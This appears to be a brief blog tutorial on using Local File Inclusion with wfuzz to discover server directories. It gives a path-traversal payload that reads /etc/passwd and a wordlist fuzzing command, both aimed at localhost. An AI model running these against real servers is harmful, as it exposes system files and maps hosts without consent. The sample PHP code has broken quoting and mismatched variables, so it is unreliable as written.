Fuzzing Directories with LFI

Fuzzing Directories with LFI

LFI stands for Local File Inclusion. It allows attackers to include,view other files on the web server.

In this post, I will try to explain how to exploit LFI even further.
Since LFI vulnerability allows us to move between upper and lower directories. We can abuse it to understand which files are under which directories by using a simple dictionary attack.
This will allow us to have a better understanding of the webserver that we are attacking.

A basic vulnerable PHP parameter works like this.

1
2
3
if(isset($vuln)){
include(“$_GET["vuln"]);
}

And a basic LFI attack logic is like this.

1
http://127.0.0.1/index.php?vuln=../../../etc/passwd

wfuzz

Wfuzz is a great tool . It has many features . It’s like a swiss army knife. I’m going to be using it at this kind of scenario.

1
2
$ wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
"http://127.0.0.1/index.php?vuln=../FUZZ/file1.php"

Let’s say that we are sure that in the server there is a php file “file1.php”.
We can abuse it and go upper directories with adding “../“ and “FUZZ”.
“../“ and “FUZZ” is pretty important because we have to add one fuzzer for each upper directory.

After some iteration,

1
http://127.0.0.1/index.php?vuln=../../../../../../var/www/secretsites/vulnerabilities/fi/file1.php

We managed to get the whole directory.

The reason why this is important is, there might be other subdomains in the web server and an attacker can also include files from other subdomains.